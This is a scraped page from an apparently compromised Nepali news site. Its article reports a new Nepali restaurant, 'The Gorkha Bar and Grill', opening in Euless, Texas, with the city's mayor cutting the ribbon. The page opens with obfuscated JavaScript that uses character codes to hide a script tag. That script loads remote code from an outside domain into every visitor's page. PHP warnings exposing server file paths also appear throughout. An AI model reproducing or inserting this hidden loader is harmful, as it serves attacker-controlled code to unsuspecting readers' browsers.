Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259

Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
अमेरिकाको टेक्सासमा नेपाली रेस्टुरा खुल्ने क्रम बढ्दो, फेरी अर्को “द गुर्खा बार एण्ड ग्रिल” – Nepali News Portal – Trending Nepali News

अमेरिकाको टेक्सासमा नेपाली रेस्टुरा खुल्ने क्रम बढ्दो, फेरी अर्को “द गुर्खा बार एण्ड ग्रिल”

अमेरिकाको टेक्सासमा धेरै भन्दा धेरै नेपाली रहेको अनुमान छ र त्यो पनि अर्भिङ्ग र युलेस सहरमा त नेपालीहरुको पुरै बस्ती नै छ भन्दा फरक नपर्ला। मिनी नेपाल भनेर अर्भिङ्ग र इयुलेसका नेपालीहरुलाई आफु बस्ने ठाउँलाइ चिनाउदै आएका छन्। त्यस्तै यसै ठाउँमा नेपालीहरुको बाक्लो बसाइ र नेपाली रेष्टुरा पनि त्यति कै धेरै। व्यवसायमा होमिने नेपालीहरुको संख्या पनि दिनानुदिन बढ्दो छ। यसै क्रममा शनिबार युलेसको मेन स्ट्रिट र हारवुड रोडमा रहेको क्रोगर कम्लेक्समा अर्को एक नेपाली रेष्टुरेण्ट “द गोर्खा बार एण्ड ग्रिल” को औपचारिक सुरुवात भएको छ ।

नेपाली र स्थानीय बिभिन्न समुदायका ब्यक्तिको बाक्लो उपस्थिति रहेको कार्यक्रममा युलेशकी मेयर लिण्डा मार्टिनले रिबन काटेर “द गोर्खा बार एण्ड ग्रिल” को उद्घाटन गरिन्। कार्यक्रमलाई सम्बोधन गर्दै उनले भनिन्- युलेशमा नेपाली ब्यवसायी थपिएकोमा ज्यादै खुशी लागेको छ भन्दै व्यवसायीहरूलाई वधाई तथा सफलताको शुभकामना दिईन।

रेष्टुरेण्ट ब्यवसयमा लामो अनुभव संगालेका बिकास कँडेल, बिकेक कँडेल, दिलिप ज्ञवाली र उर्मिला ढकालले सामुहिक रुपमा ब्यवसाय सुरु गरेका हुन् । नेपाली परिकारसहित बिभिन्न परिकारका खानामा भिन्न स्वाद दिएर ग्राहकलाई खुशी पार्ने योजनामा रहेको एक सन्चालक बिकास कँडेलले बताए । त्यस्तै विभिन्न समारोह गर्नको लागि पनि पार्टि हलको पनि व्यवस्था रहेको छ यो रेष्टुरेण्टमा।

nepalitvshow

nepalitvshow

Read Previous

अमेरिकाको न्युयोर्कमा प्राशा तुलाधरको निधन

Read Next

राष्ट्रिय क्रिकेट टिममा समावेश हुन धेरै युवा खेलाडीहरु आतुर: पारस खड्का

Leave a Reply

Your email address will not be published. Required fields are marked *


Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13